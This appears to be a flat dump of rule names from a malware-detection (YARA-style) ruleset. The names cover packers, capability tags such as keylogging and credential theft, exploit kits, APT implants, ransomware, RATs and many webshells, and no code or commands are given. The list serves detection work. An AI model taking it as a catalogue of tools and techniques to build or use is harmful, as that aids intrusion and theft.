AsCryptv01SToRM2 AsCryptv01SToRM3 AsCryptv01SToRM4 PackItBitch10archphase SafeDiscv4 EXECryptorv153 Crunch5Fusion4 NorthStarPEShrinkerv13byLiuxingping Armadillo430aSiliconRealmsToolworks STProtectorV15SilentSoftware ANDpakk2006DmitryAndreev NETexecutableMicrosoft AZProtect0001byAlexZakaAZCRC ExeSplitter12BillPrisonerTPOC Morphinev27Holy_FatherRatter29A EnigmaProtector11X13XSukhovVladimirSergeNMarkin AsCryptv01SToRM1 MaskPE16yzkzero ASProtectv20 UnnamedScrambler10p0ke UPXHiT001DJSiba yPv10bbyAshkbizDanehkar MSLRHv031a Upackv039finalDwing FakeNinjav28Spirit DragonArmorOrient Upackv032BetaPatchDwing Apex30alpha500mhz ExeSplitter13SplitMethodBillPrisonerTPOC RJoiner12aVaska UPXInlinerv10byGPcH SLVc0deProtector060SLVICU Upackv029Betav031BetaDwing AlexProtector10beta2byAlex MoleBoxv254Teggo Themida10xx18xxnocompressionOreansTechnologies PolyBoxDAnskya nBinderv40 SimplePack12build3009Method2bagie RSCsProcessPatcherv151 VMProtect106107PolyTech USSR031bySpirit ASProtectv123RC4build0807exeAlexeySolodovnikov eXPressorProtection150XCGSoftLabs XHider10GlobaL UnnamedScrambler25Ap0ke InnoSetupModule FreeCryptor01build002GlOFF NTPackerV2XErazerZ SiliconRealmsInstallStub MoleBoxv20 AI1Creator1Beta2byMZ Setup2GoInstallerStub mkfpackllydd PrivateexeProtectorV18SetiSoftTeam DotFixNiceProtect21GPcHSoft SimplePackV11XMethod2bagie NullsoftInstallSystemv20 SLVc0deProtectorv11SLV PEArmor04600759hying RpolycryptbyVaska2003071841 DevCv4 DevCv5 UnderGroundCrypterbyBooster2000 PrivateEXEProtector18 PolyCryptPE214b215JLabSoftwareCreationshsigned MEW10byNorthfox MaskPEV20yzkzero ChinaProtectdummy MinkeV101Codius ElicenseSystemV4000ViaTechInc PEStubOEPv1x EXECryptor2117StrongbitSoftCompleteDevelopment GHFProtectorpackonlyGPcH UPXV194MarkusOberhumerLaszloMolnarJohnReiser SoftComp1xBGSoftPT PeCompact2253276BitSumTechnologies FlyCrypter10ut1lz RSCsProcessPatcherv14 hmimysPacker10hmimys RLPackV112V114LZMA430ap0x EXECryptorV22Xsoftcompletecom PeStubOEPv1x DEFv10 UnnamedScrambler251Beta2252p0ke PrivateEXEProtector18SetiSoft Safe20 MZ_Crypt10byBrainSt0rm NTKrnlPackerAshkbizDanehkar NME11Publicbyredlime FakeNinjav28AntiDebugSpirit EnigmaProtector10XSukhovVladimir PEProtect09byCristophGabler1998 RCryptorv16dVaska Enigmaprotector112VladimirSukhov PolyEnEV001LennartHedlund TrainerCreationKitv5Trainer EXEStealthv273 EXEStealthv274 ProtectSharewareV11eCompservCMS Upackv035alphaDwing InnoSetupModulev304betav306v307 ASDPackv10asd ORiENV1XV2XFisunAV ARMProtector03bySMoKE DzAPatcherv13Loader NullsoftPiMPInstallSystemv1x EXECryptor2223protectedIAT Morphinev33SilentSoftwareSilentShieldc2005 VMProtect07x08PolyTech WerusCrypter10Kas PEQuakev006byfORGAT Anti007V26LiuXingPing aPackv098m BamBamv001Bedrock EXEStealthv25 Shrinker33 Shrinker32 Shrinker34 eXPressorv120b SCObfuscatorSuperCRacker eXPressorv14CGSoftLabs PUNiSHERV15FEUERRADER nMacrorecorder10 iPBProtectv013 PrivateEXEProtector197SetiSoft FSGv20 SimplePack1XMethod2bagie FishPEShield112116HellFish PrivateexeProtector20SetiSoftTeam PEBundlev310 PECompactv2xx Armadillo440SiliconRealmsToolworks EXEStealth276UnregisteredWebtoolMaster ABCCryptor10byZloY RLPackV112V114aPlib043ap0x Crypter31SLESH FreeCryptor02build002GlOFF PackItBitchV10archphase NullsoftInstallSystemv20b4 BeRoEXEPackerV100BeRo VIRUSIWormHybris GPInstallv50332 VIRUSIWormBagle UnnamedScrambler20p0ke NsPackv31NorthStar HyingsPEArmor075exeHyingCCG SimplePack121build0909Method2bagie UnnamedScrambler12C12Dp0ke AlexProtectorv04beta1byAlex FishPEShield101HellFish PrivateexeProtector21522XSetiSoftTeam PiCryptor10byScofield PEArmor07600765hying VBOXv43v46 ARMProtectorv01bySMoKE NullsoftInstallSystemv20a0 D1S1Gv11betaD1N INCrypter03INinYbyz3e_NiFe MorphineV27Holy_FatherRatter29A nBinderv361 MatrixDongleTDiGmbH NullsoftInstallSystemv20RC2 MSLRHv01emadicius VProtector11A12vcasm codeCrypter031 RLPackFullEditionV11Xap0x Escargot01byueMeat ACProtectv135riscosoftwareIncAnticrackSoftware winrar_sfx mpress_2_xx_net rpx_1_xx dotfuscator AutoIt_2 IsPE64 IsWindowsGUI HasTaggantSignature HasRichSignature free_pascal borland_delphi_dll AutoIt Microsoft_Visual_Cpp_V80_Debug Microsoft_Visual_Cpp_80_Debug_ Microsoft_Visual_Cpp_80_Debug inject_thread create_service create_com_service network_udp_sock network_tcp_listen network_dyndns network_smtp_dotNet network_smtp_raw network_smtp_vb network_p2p_win network_irc network_http network_dropper network_ftp network_tcp_socket network_dns network_ssl network_dga bitcoin escalate_priv screenshot lookupip lookupgeo keylogger cred_local sniff_audio cred_ff cred_vnc cred_ie7 sniff_lan migrate_apc spreading_file spreading_share rat_vnc rat_rdp rat_webcam win_mutex win_registry win_token win_private_profile win_files_operation Str_Win32_Winsock2_Library Str_Win32_Wininet_Library Str_Win32_Internet_API Str_Win32_Http_API ldpreload DebuggerCheck__PEB DebuggerCheck__GlobalFlags DebuggerCheck__QueryInfo DebuggerCheck__RemoteAPI DebuggerHiding__Thread DebuggerHiding__Active DebuggerException__ConsoleCtrl DebuggerException__SetConsoleCtrl ThreadControl__Context DebuggerCheck__DrWatson SEH__v3 SEH__v4 SEH__vba SEH__vectored SEH_Save SEH_Init Check_Wine vmdetect Check_FilePaths Check_OutputDebugStringA_iat WMI_VM_Detect anti_dbg anti_dbgtools antisb_threatExpert antisb_sandboxie antivm_virtualbox antivm_vmware disable_antivirus disable_firewall disable_dep win_hook vmdetect_misc angler_flash angler_flash2 angler_flash4 angler_flash5 angler_flash_uncompressed angler_html angler_html2 angler_js blackhole2_jar blackhole2_jar2 blackhole2_jar3 blackhole2_pdf blackhole1_jar blackhole2_htm blackhole2_htm10 blackhole2_htm11 blackhole2_htm12 blackhole2_htm3 blackhole2_htm4 blackhole2_htm5 blackhole2_htm6 blackhole2_htm8 bleedinglife2_adobe_2010_1297_exploit bleedinglife2_adobe_2010_2884_exploit bleedinglife2_jar2 bleedinglife2_java_2010_0842_exploit crimepack_jar crimepack_jar3 eleonore_jar eleonore_jar2 eleonore_jar3 eleonore_js eleonore_js2 eleonore_js3 fragus_htm fragus_js fragus_js2 fragus_js_flash fragus_js_java fragus_js_quicktime fragus_js_vml phoenix_html phoenix_html10 phoenix_html11 phoenix_html2 phoenix_html3 phoenix_html4 phoenix_html5 phoenix_html6 phoenix_html7 phoenix_html8 phoenix_html9 phoenix_jar phoenix_jar2 phoenix_jar3 phoenix_pdf phoenix_pdf2 phoenix_pdf3 sakura_jar sakura_jar2 zeroaccess_css zeroaccess_css2 zeroaccess_htm zeroaccess_js zeroaccess_js2 zeroaccess_js3 zeroaccess_js4 zerox88_js2 zerox88_js3 zeus_js Big_Numbers0 Big_Numbers1 Big_Numbers2 Big_Numbers3 Prime_Constants_char Prime_Constants_long Advapi_Hash_API Crypt32_CryptBinaryToString_API CRC32c_poly_Constant CRC32_poly_Constant CRC32_table CRC32_table_lookup CRC32b_poly_Constant CRC16_table FlyUtilsCnDES_ECB_Encrypt FlyUtilsCnDES_ECB_Decrypt Elf_Hash BLOWFISH_Constants MD5_Constants MD5_API RC6_Constants RIPEMD160_Constants SHA1_Constants SHA512_Constants TEAN WHIRLPOOL_Constants DarkEYEv3_Cryptor Miracl_powmod Miracl_crt CryptoPP_a_exp_b_mod_c CryptoPP_modulo FGint_MontgomeryModExp FGint_FGIntModExp FGint_MulByInt FGint_DivMod FGint_FGIntDestroy FGint_Base10StringToGInt FGint_ConvertBase256to64 FGint_ConvertHexStringToBase256String FGint_Base256StringToGInt FGint_FGIntToBase256String FGint_ConvertBase256StringToHexString FGint_PGPConvertBase256to64 FGint_RSAEncrypt FGint_RsaDecrypt FGint_RSAVerify FGint_FindPrimeGoodCurveAndPoint FGint_ECElGamalEncrypt FGint_ECAddPoints FGint_ECPointKMultiple FGint_ECPointDestroy FGint_DSAPrimeSearch FGint_DSASign FGint_DSAVerify DES_Long DES_sbox DES_pbox_long OpenSSL_BN_mod_exp2_mont OpenSSL_BN_mod_exp_mont OpenSSL_BN_mod_exp_recp OpenSSL_BN_mod_exp_simple OpenSSL_BN_mod_exp_inverse OpenSSL_DSA FGint_RsaSign LockBox_RsaEncryptFile LockBox_DecryptRsaEx LockBox_EncryptRsaEx LockBox_TlbRsaKey BigDig_bpInit BigDig_mpModExp BigDig_mpModInv BigDig_mpModMult BigDig_mpModulo BigDig_spModExpB BigDig_spModInv BigDig_spModMult CryptoPP_ApplyFunction CryptoPP_RsaFunction CryptoPP_Integer_constructor RijnDael_AES RijnDael_AES_CHAR RijnDael_AES_CHAR_inv RijnDael_AES_LONG RsaRef2_NN_modExp RsaRef2_NN_modInv RsaRef2_NN_modMult RsaRef2_RsaPrivateDecrypt RsaRef2_RsaPrivateEncrypt RsaRef2_RsaPublicDecrypt RsaRef2_RsaPublicEncrypt RsaEuro_NN_modInv RsaEuro_NN_modMult Miracl_Big_constructor Miracl_mirvar Miracl_mirsys_init BASE64_table Delphi_Random Delphi_RandomRange Delphi_FormShow Delphi_CompareCall Delphi_Copy Delphi_IntToStr Delphi_StrToInt Delphi_DecodeDate Unknown_Random VC6_Random VC8_Random DCP_RIJNDAEL_Init DCP_RIJNDAEL_EncryptECB DCP_BLOWFISH_Init DCP_BLOWFISH_EncryptCBC DCP_DES_Init DCP_DES_EncryptECB cve_2013_0074 Exploit_MS15_077_078 Mal_http_EXE Linux_DirtyCow_Exploit LIGHTDART_APT1 AURIGA_APT1 BANGAT_APT1 BISCUIT_GREENCAT_APT1 BOUNCER_APT1 BOUNCER_DLL_APT1 CALENDAR_APT1 COMBOS_APT1 DAIRY_APT1 GLOOXMAIL_APT1 GOGGLES_APT1 HACKSFASE1_APT1 HACKSFASE2_APT1 KURTON_APT1 MACROMAIL_APT1 MANITSME_APT1 MINIASP_APT1 NEWSREELS_APT1 SEASALT_APT1 STARSYPOUND_APT1 SWORD_APT1 thequickbrow_APT1 TABMSGSQL_APT1 CCREWBACK1 TrojanCookies_CCREW GEN_CCREW1 Elise EclipseSunCloudRAT MoonProject ccrewDownloader1 ccrewDownloader2 ccrewMiniasp ccrewSSLBack2 ccrewSSLBack3 ccrewSSLBack1 ccrewDownloader3 ccrewQAZ metaxcd MiniASP DownloaderPossibleCCrew APT1_LIGHTBOLT APT1_GETMAIL APT1_GDOCUPLOAD APT1_WEBC2_Y21K APT1_WEBC2_YAHOO APT1_WEBC2_UGX APT1_WEBC2_TOCK APT1_WEBC2_RAVE APT1_WEBC2_QBP APT1_WEBC2_HEAD APT1_WEBC2_GREENCAT APT1_WEBC2_DIV APT1_WEBC2_CSON APT1_WEBC2_CLOVER APT1_WEBC2_BOLID APT1_WEBC2_ADSPACE APT1_WEBC2_AUSOV APT1_WARP APT1_TARSIP_ECLIPSE APT1_TARSIP_MOON APT1_RARSilent_EXE_PDF APT1_aspnetreport APT1_Revird_svc APT1_dbg_mess APT1_known_malicious_RARSilent REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief REDLEAVES_CoreImplant_UniqueStrings PLUGX_RedLeaves APT3102Code APT9002Code APT9002Strings APT9002 FE_APT_9002 apt_backspace APT_bestia apt_c16_win_memory_pcclient apt_c16_win_swisyn apt_c16_win_wateringhole Careto_OSX_SBD Careto_CnC Careto_CnC_domains Casper_Included_Strings Casper_SystemInformation_Output Codoso_Gh0st_3 Codoso_Gh0st_1 Codoso_PGV_PVID_3 Codoso_PGV_PVID_1 APT_DeputyDog_Fexel APT_DeputyDog apt_win_exe_trojan_derusbi Trojan_Derusbi APT_Derusbi_DeepPanda APT_Derusbi_Gen derusbi_kernel apt_win32_dll_bergard_pgv_pvid_variant Dubnium_Sample_SSHOpenSSL EQGRP_create_dns_injection EQGRP_tunnel_state_reader EQGRP_eligiblecandidate EQGRP_sniffer_xml2pcap EQGRP_BananaAid EQGRP_shellcode EQGRP_jetplow_SH EQGRP_extrabacon EQGRP_sploit_py EQGRP_StoreFc EQGRP_callbacks EQGRP_Unique_Strings EQGRP_RC5_RC6_Opcode apt_equation_exploitlib_mutexes apt_equation_equationlaser_runtimeclasses apt_equation_cryptotable apt_equation_keyword FVEY_ShadowBrokers_Jan17_Screen_Strings FiveEyes_QUERTY_Malwaresig_20123_cmdDef FiveEyes_QUERTY_Malwareqwerty_20123 FiveEyes_QUERTY_Malwaresig_20120_dll FiveEyes_QUERTY_Malwaresig_20120_cmdDef FiveEyes_QUERTY_Malwaresig_20121_cmdDef Greenbug_Malware_4 IMPLANT_1_v3 IMPLANT_1_v7 IMPLANT_2_v3 IMPLANT_2_v15 IMPLANT_2_v17 IMPLANT_3_v1 IMPLANT_3_v3 IMPLANT_4_v2 IMPLANT_4_v3_AlternativeRule IMPLANT_4_v4 IMPLANT_4_v5 IMPLANT_4_v9 IMPLANT_4_v10 IMPLANT_4_v11 IMPLANT_5_v2 IMPLANT_5_v3 IMPLANT_5_v4 IMPLANT_6_v1 IMPLANT_6_v2 IMPLANT_7_v1 IMPLANT_8_v1 IMPLANT_10_v2 Unidentified_Malware_Two apt_hellsing_implantstrings APT_Hikit_msrv IronTiger_ASPXSpy IronTiger_ChangePort_Toolkit_driversinstall IronTiger_ChangePort_Toolkit_ChangePortExe IronTiger_dllshellexc2010 IronTiger_dnstunnel IronTiger_EFH3_encoder IronTiger_GetPassword_x64 IronTiger_GetUserInfo IronTiger_Gh0stRAT_variant IronTiger_GTalk_Trojan IronTiger_HTTPBrowser_Dropper IronTiger_HTTP_SOCKS_Proxy_soexe IronTiger_NBDDos_Gh0stvariant_dropper IronTiger_PlugX_DosEmulator IronTiger_PlugX_FastProxy IronTiger_PlugX_Server IronTiger_ReadPWD86 IronTiger_Ring_Gh0stvariant IronTiger_wmiexec IronPanda_Malware_Htran KeyBoy_Dropper KeyBoy_Backdoor EliseLotusBlossom MirageStrings Mirage Mirage_APT Molerats_certs MongalCode MongalStrings Mongal APT_NGO_wuaclt ZhoupinExploitCrew BackDoorLogger Jasus NetC ShellCreator2 SmartCopy2 SynFlooder TinyZBot antivirusdetector csext kagent mimikatzWrapper pvz_in pvz_out wndTest zhCat zhLookUp zhmimikatz Zh0uSh311 OPCLEAVER_BackDoorLogger OPCLEAVER_Jasus OPCLEAVER_NetC OPCLEAVER_ShellCreator2 OPCLEAVER_SmartCopy2 OPCLEAVER_SynFlooder OPCLEAVER_TinyZBot OPCLEAVER_ZhoupinExploitCrew OPCLEAVER_antivirusdetector OPCLEAVER_csext OPCLEAVER_kagent OPCLEAVER_mimikatzWrapper OPCLEAVER_pvz_in OPCLEAVER_pvz_out OPCLEAVER_wndTest OPCLEAVER_zhLookUp OPCLEAVER_zhmimikatz OpClandestineWolf Misdat_Backdoor SType_Backdoor Zlib_Backdoor Potao backdoor_apt_pcclient PassCV_Sabre_Malware_Signing_Cert PassCV_Sabre_Malware_Excalibur_1 PassCV_Sabre_Malware_5 APT_Win_Pipcreat Trojan_Win32_PlaSrv Trojan_Win32_Platual Trojan_Win32_Plaplex Trojan_Win32_Dipsind_B Trojan_Win32_PlaKeylog_B Trojan_Win32_Adupib Trojan_Win32_PlaLsaLog Trojan_Win32_Plakelog Trojan_Win32_Plainst Trojan_Win32_Plagicom Trojan_Win32_Plaklog Trojan_Win32_Plapiio Trojan_Win32_Plabit Trojan_Win32_Placisc2 Trojan_Win32_Placisc3 Trojan_Win32_Placisc4 PrikormkaDropper PrikormkaModule Prikormka apt_regin_legspin apt_regin_rc5key apt_regin_dispatcher_disp_dll Scieron apt_sofacy_xtunnel StuxNet_Malware_1 liudoor ThreatGroup3390_C2 Turla_APT_Malware_Gen2 turla_dropper dubseven_dropper_dialog_remains maindll_mutex SLServer_dialog_remains SLServer_mutex SLServer_command_and_control SLServer_campaign_code SLServer_unknown_string Unit78020_Malware_Gen1 WaterBug_wipbot_2013_dll WaterBug_wipbot_2013_core WaterBug_turla_dropper WaterBug_fa_malware WaterBug_sav onimiki WinntiPharma WoolenGoldfish_Generic_3 EquationGroup_elgingamble EquationGroup_sambal EquationGroup__jparsescan_parsescan_5 EquationGroup_Toolset_Apr17_Gen2 EquationGroup_Toolset_Apr17_ntevt EquationGroup_Toolset_Apr17_EXPA EquationGroup_Toolset_Apr17_DiBa_Target_BH EquationGroup_Toolset_Apr17_DiBa_Target EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld EquationGroup_Toolset_Apr17__vtuner_vtuner_1 EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 COZY_FANCY_BEAR_pagemgr_Hunt Furtim_nativeDLL GEN_PowerShell alina Worm_Gamarue AthenaHTTP AthenaHTTP_v2 AthenaIRC Atmos_Builder backoff BangatCode BangatStrings Bangat BlackRev BlackWorm BoousetCode Bublik CAP_HookExKeylogger ChickenDOS_Linux citadel13xy Citadel_Malware CookiesStrings Cookies cxpidStrings cxpidCode Cythosia DDosTf Derkziel dexter_strings diamond_fox Trj_Elex_Installer Trj_Elex_Service64 Empire_Get_SecurityPackages Empire_Invoke_EgressCheck Empire_PowerShell_Framework_Gen2 Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen EnfalCode EnfalStrings Enfal Win7Elevatev2 UACME_Akagi EzcobStrings Ezcob ws_f0xy_downloader FavoriteCode FavoriteStrings genome GlassesCode Glasses GoziRule Grozlex Hsdfihdf IMulerCode IMulerStrings IMuler iexpl0reCode iexpl0reStrings iexpl0re Insta11Code Insta11Strings Insta11 Intel_Virtualization_Wizard_exe Intel_Virtualization_Wizard_dll KelihosHlux korlia SharedStrings lateral_movement lost_door LuckyCatCode MacControlCode MacControlStrings MacControl dump_sales_quote_payment dump_sales_order md5_64651cede2467fdeb1b3b7e6ff3f81cb md5_6bf4910b01aa4f296e590b75a3d25642 fopo_webshell eval_post spam_mailer md5_2c37d90dd2c9c743c273cb955dd83ef6 md5_3ccdd51fe616c08daafd601589182d38 md5_4b69af81b89ba444204680d506a8e0a1 md5_71a7c769e644d8cf3cf32419239212c7 md5_87cf8209494eedd936b28ff620e28780 md5_fb9e35bf367a106d18eb6aa0fe406437 md5_8e5f7f6523891a5dcefcbb1a79e5bbe9 eval_base64_decode_a md5_ab63230ee24a988a4a9245c2456e4874 md5_d30b23d1224438518d18e90c218d7c8b md5_24f2df1b9d49cfb02d8954b08dba471f md5_fd141197c89d27b30821f3de8627ac38 visbot md5_4c4b3d4ba5bce7191a5138efa2468679 md5_6eb201737a6ef3c4880ae0b8983398a9 md5_d201d61510f7889f1a47257d52b15fa2 md5_06e3ed58854daeacf1ed82c56a883b04 md5_28690a72362e021f65bb74eecc54255e fake_magentoupdate_site md5_4aa900ddd4f1848a15c61a9b7acd5035 sinlesspleasure_com amasty_biz amasty_biz_js cloudfusion_me grelos_v hacked_domains jquery_code_su jquery_code_su_multi Trafficanalyzer_js atob_js googieplay_js mag_php_js thetech_org_js md5_cdn_js_link_js Trojan_W32_Gh0stMiancha_1_0_0 Mirai_Generic_Arch Mirai_4 Mirai_Dwnl Mirai_5 memory_pivy memory_shylock Cloaked_as_JPG rtf_yahoo_ken ZXProxy EmiratesStatement SpyGate_v2_9 qadars shylock spyeye spyeye_plugins callTogether_certificate qti_certificate DownExecute_A Pandora Base64_encoded_Executable Invoke_mimikittenz LinuxAESDDoS LinuxBillGates LinuxElknot LinuxMrBlack LinuxTsunami rootkit exploit NSFreeCode NSFreeStrings NSFree NaikonCode NaikonStrings Naikon nAspyUpdateCode nAspyUpdateStrings nAspyUpdate NetpassStrings NetPass NetTravStrings NetTravExports NetTraveler NionSpy TROJAN_Notepad Odinaff_swift OlyxCode OlyxStrings Olyx pony PubSabCode PubSabStrings PubSab PE_File_pyinstaller QuarianStrings QuarianCode Quarian RegSubDatStrings RegSubDat Retefe RooterCode Rooter RookieStrings Rookie rovnix_downloader SafeNetCode SafeNetStrings SafeNet ScarhiknStrings ScarhiknCode Scarhikn sendsafe CrowdStrike_Shamoon_DroppedFile EldoS_RawDisk Shifu skeleton_key_patcher skeleton_key_injected_code Spora unk_packer with_sqlite universal_1337_stealer_serveur RSharedStrings GmRemoteStrings GmRemote SurtrStrings SurtrCode Surtr T5000Strings T5000 Tedroo Tinba2 ELF_Linux_Torte_domains TreasureHunt urausy_skype_dat VidgrabStrings Vidgrab Wabot WarpCode WarpStrings Warp WimmieShellcode WimmieStrings Wimmie XMRIG_Miner XOR_DDosv1 YayihCode YayihStrings Yayih Zegost Windows_Malware_Zeus viotto_keylogger xDedic_SysScan_unpacked DeltaCharlie IndiaAlfa_One IndiaBravo_PapaAlfa IndiaBravo_RomeoCharlie IndiaBravo_RomeoBravo IndiaBravo_generic IndiaCharlie_One IndiaCharlie_Two LimaCharlie PapaAlfa RomeoCharlie RomeoEcho RomeoFoxtrot SierraBravo_packed SierraCharlie RomeoJuliettMikeTwo TangoAlfa WhiskeyAlfa WhiskeyDelta Lightweight_Backdoor1 LightweightBackdoor2 LightweightBackdoor3 LightweightBackdoor4 LightweightBackdoor5 LightweightBackdoor6 ProxyTool1 ProxyTool2 ProxyTool3 DestructiveTargetCleaningTool5 DestructiveTargetCleaningTool6 DestructiveTargetCleaningTool7 Malwareusedbycyberthreatactor1 Malwareusedbycyberthreatactor2 Malwareusedbycyberthreatactor3 wiper_unique_strings wiper_encoded_strings createP2P dump_tool misc_pos unknown regex_pos regexpr_pos reg_pos sets_pos monitor_tool_pos keyfinder_tool memdump_diablo blazingtools sysocmgr lacy_keylogger searchinject heistenberg_pos pos_jack pos_memory_scrapper_ pos_uploader pos_chewbacca BernhardPOS easterjackpos LogPOS Mozart Ransom_CryptXXX_Dropper Ransom_CryptXXX_Real legion_777 Ransom_Alpha Ransom_Alfa cerber3 cerber4 cerber5 Ransom CryptoLocker_set1 CryptoLocker_rule2 BackdoorFCKG DMALocker DMALocker4 Locky_Ransomware Locky_Ransomware_2 Ransom_Petya Ransom_Satana Ransom_Satana_Dropper TeslaCrypt Win32Toxic Adzok BlackShades2 BlackShades_4 BlackShades BlackShades_25052015 Bolonyokte Bozok Cerberus Crimson CyberGate DarkComet_2 DarkComet_3 DarkComet_4 CSIT_14003_03 gh0st gholeeV1 MW_gholee_v1 glassrat Win32OPCHavex Win32FertgerHavex Havex_Trojan_PHP_Server Indetectables_RAT Meterpreter_Reverse_Tcp NetWiredRC_B Njrat njrat1 win_exe_njRAT network_traffic_njRAT PlugXStrings plugX PoisonIvy_2 AAR Ap0calypse Arcom BlackNix BlueBanana ClientMesh DarkRAT Greame HawkEye Imminent Infinity JavaDropper LostDoor LuminosityLink LuxNet NanoCore Paradox Plasma PredatorPain Punisher PythoRAT QRat SmallNet SpyGate Sub7Nation UPX Vertex unrecom ShadowTech shimrat shimratreporter TerminatorRat TROJAN_Notepad_shell_crew xtreme_rat XtremeRATCode XtremeRATStrings XtremeRAT xtremrat zoxPNG_RAT xRAT xRAT20 HTTPSCANNER dubrute Powerkatz_DLL_Generic WindowsCredentialEditor Amplia_Security_Tool PScan_Portscan_1 HackTool_Samples Fierce2 Ncrack SQLMap PortScanner NetBIOS_Name_Scanner FeliksPack3___Scanners_ipscan CGISscan_CGIScan IP_Stealing_Utilities PortRacer scanarator _Bitchin_Threads_ portscan ProPort_zip_Folder_ProPort StealthWasp_s_Basic_PortScanner_v1_2 BluesPortScan scanarator_iis Angry_IP_Scanner_v2_08_ipscan crack_Loader WCE_Modified_1_1014 BypassUac_3 APT_Proxy_Malware_Packed_dev Hacktools_CN_Panda_Burst Hacktools_CN_Burst_Blast Jc_WinEggDrop_Shell LinuxHacktool_eyes_pscan2 CN_Portscan Mimikatz_Memory_Rule_1 Mimikatz_Memory_Rule_2 VSSown_VBS Payload_Exe2Hex Contains_hidden_PE_File_inside_a_sequence_of_numbers possible_exploit XDP_embedded_PDF powershell Contains_UserForm_Object malrtf_ole2link maldoc_API_hashing maldoc_indirect_function_call_1 maldoc_indirect_function_call_2 maldoc_indirect_function_call_3 maldoc_find_kernel32_base_method_1 maldoc_getEIP_method_1 macrocheck Backdoor_WebShell_asp webshell_iMHaPFtp_2 webshell_caidao_shell_guo webshell_cihshell_fix webshell_asp_EFSO_2 webshell_caidao_shell_ice_2 webshell_asp_ice webshell_asp_404 webshell_webshell_cnseay02_1 webshell_php_fbi webshell_B374kPHP_B374k webshell_caidao_shell_404 webshell_ASP_aspydrv webshell_Dx_Dx webshell_MySQL_Web_Interface_Version_0_8 webshell_wsb_idc webshell_webshell_cnseay_x webshell_phpkit_0_1a_odd webshell_Java_Shell webshell_simple_backdoor webshell_PHP_c37 webshell_PHP_b37 webshell_ghost_source_icesword_silic webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx webshell_itsec_PHPJackal_itsecteam_shell_jHn webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY webshell_webshells_new_con2 webshell_Expdoor_com_ASP webshell_webshells_new_php2 webshell_bypass_iisuser_p webshell_sig_404super webshell_webshells_new_JSP webshell_dev_core webshell_webshells_new_pHp webshell_webshells_new_pppp webshell_webshells_new_code webshell_webshells_new_xxxx webshell_webshells_new_PHP1 webshell_webshells_new_php6 webshell_GetPostpHp webshell_webshells_new_php5 perlbot_pl php_backdoor_php Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php shankar_php_php Casus15_php_php small_php_php shellbot_pl fuckphpshell_php ngh_php_php jsp_reverse_jsp Tool_asp NT_Addy_asp SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php phvayvv_php_php r57shell_php_php rst_sql_php_php wh_bindshell_py lurm_safemod_on_cgi c99madshell_v2_0_php_php w3d_php_php WinX_Shell_html Dx_php_php csh_php_php pHpINJ_php_php sig_2008_php_php ak74shell_php_php Rem_View_php_php STNC_php_php aZRaiLPhp_v1_0_php zacosmall_php CmdAsp_asp simple_backdoor_php mysql_shell_php Dive_Shell_1_0___Emperor_Hacking_Team_php Asmodeus_v0_1_pl Reader_asp phpshell17_php SimShell_1_0___Simorgh_Security_MGZ_php jspshall_jsp rootshell_php connectback2_pl shells_PHP_wso backdoor1_php elmaliseker_asp s72_Shell_v1_1_Coding_html hidshell_php_php kacak_asp PHP_Backdoor_Connect_pl_php Antichat_Socks5_Server_php_php Antichat_Shell_v1_3_php Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php cyberlords_sql_php_php Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html EFSO_2_asp lamashell_php Ajax_PHP_Command_Shell_php JspWebshell_1_2_jsp Sincap_php_php sh_php_php phpjackal_php sql_php_php cgi_python_py telnetd_pl php_include_w_shell_php Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php shell_php_php telnet_cgi ironshell_php backdoorfr_php aspydrv_asp cmdjsp_jsp h4ntu_shell__powered_by_tsoi_ Ajan_asp PHANTASMA_php MySQL_Web_Interface_Version_0_8_php multiple_webshells_0002 multiple_webshells_0003 multiple_webshells_0005 multiple_webshells_0010 multiple_webshells_0015 multiple_webshells_0016 multiple_php_webshells multiple_webshells_0019 multiple_webshells_0022 multiple_webshells_0030 multiple_webshells_0031 PHP_Cloaked_Webshell_SuperFetchExec WebShell_simattacker WebShell_b374k_mini_shell_php_php WebShell_b374k_php WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend WebShell_h4ntu_shell__powered_by_tsoi_ WebShell_php_webshells_MyShell WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit WebShell_php_backdoor WebShell_php_webshells_pHpINJ WebShell_php_webshells_NGH WebShell_php_webshells_matamu WebShell_ru24_post_sh WebShell_hiddens_shell_v1 WebShell_safe0ver WebShell_lamashell WebShell_Simple_PHP_backdoor_by_DK WebShell_AK_74_Security_Team_Web_Shell_Beta_Version WebShell_qsd_php_backdoor WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz WebShell_WinX_Shell WebShell_php_include_w_shell WebShell_PhpSpy_Ver_2006 WebShell_go_shell WebShell_zehir4_asp_php WebShell_CasuS_1_5 WebShell__findsock_php_findsock_shell_php_reverse_shell Unpack_Injectt FeliksPack3___PHP_Shells_ssh bin_Client ZXshell2_0_rar_Folder_ZXshell RkNTLoad binder2_binder2 thelast_orice2 sendmail FSO_s_zehir4 hkshell_hkshell DarkSpy105 EditServer_Webshell FSO_s_reader svchostdll HYTop_DevPack_server vanquish BIN_Client Simple_PHP_BackDooR hkshell_hkrmv FeliksPack3___PHP_Shells_phpft bdcli100 rdrbs084 HYTop_CaseSwitch_2005 FSO_s_casus15_2 installer elmaliseker shelltools_g0t_root_resolve shelltools_g0t_root_Fport HYTop_DevPack_upload PasswordReminder rknt_zip_Folder_RkNT dbgntboot PHP_shell rdrbs100 Mithril_Mithril hkdoordll Mithril_v1_45_dllTest dbgiis6cli Debug_cress FeliksPack3___PHP_Shells_usr FSO_s_phpinj xssshell_db EditServer_Webshell_2 by064cli Mithril_dllTest connector shelltools_g0t_root_HideRun regshell PHP_Shell_v1_7 xssshell_save screencap ZXshell2_0_rar_Folder_zxrecv _root_040_zip_Folder_deploy by063cli icyfox007v1_10_rar_Folder_asp byshell063_ntboot_2 shelltools_g0t_root_xwhois vanquish_2 ZXshell2_0_rar_Folder_nc BIN_Server 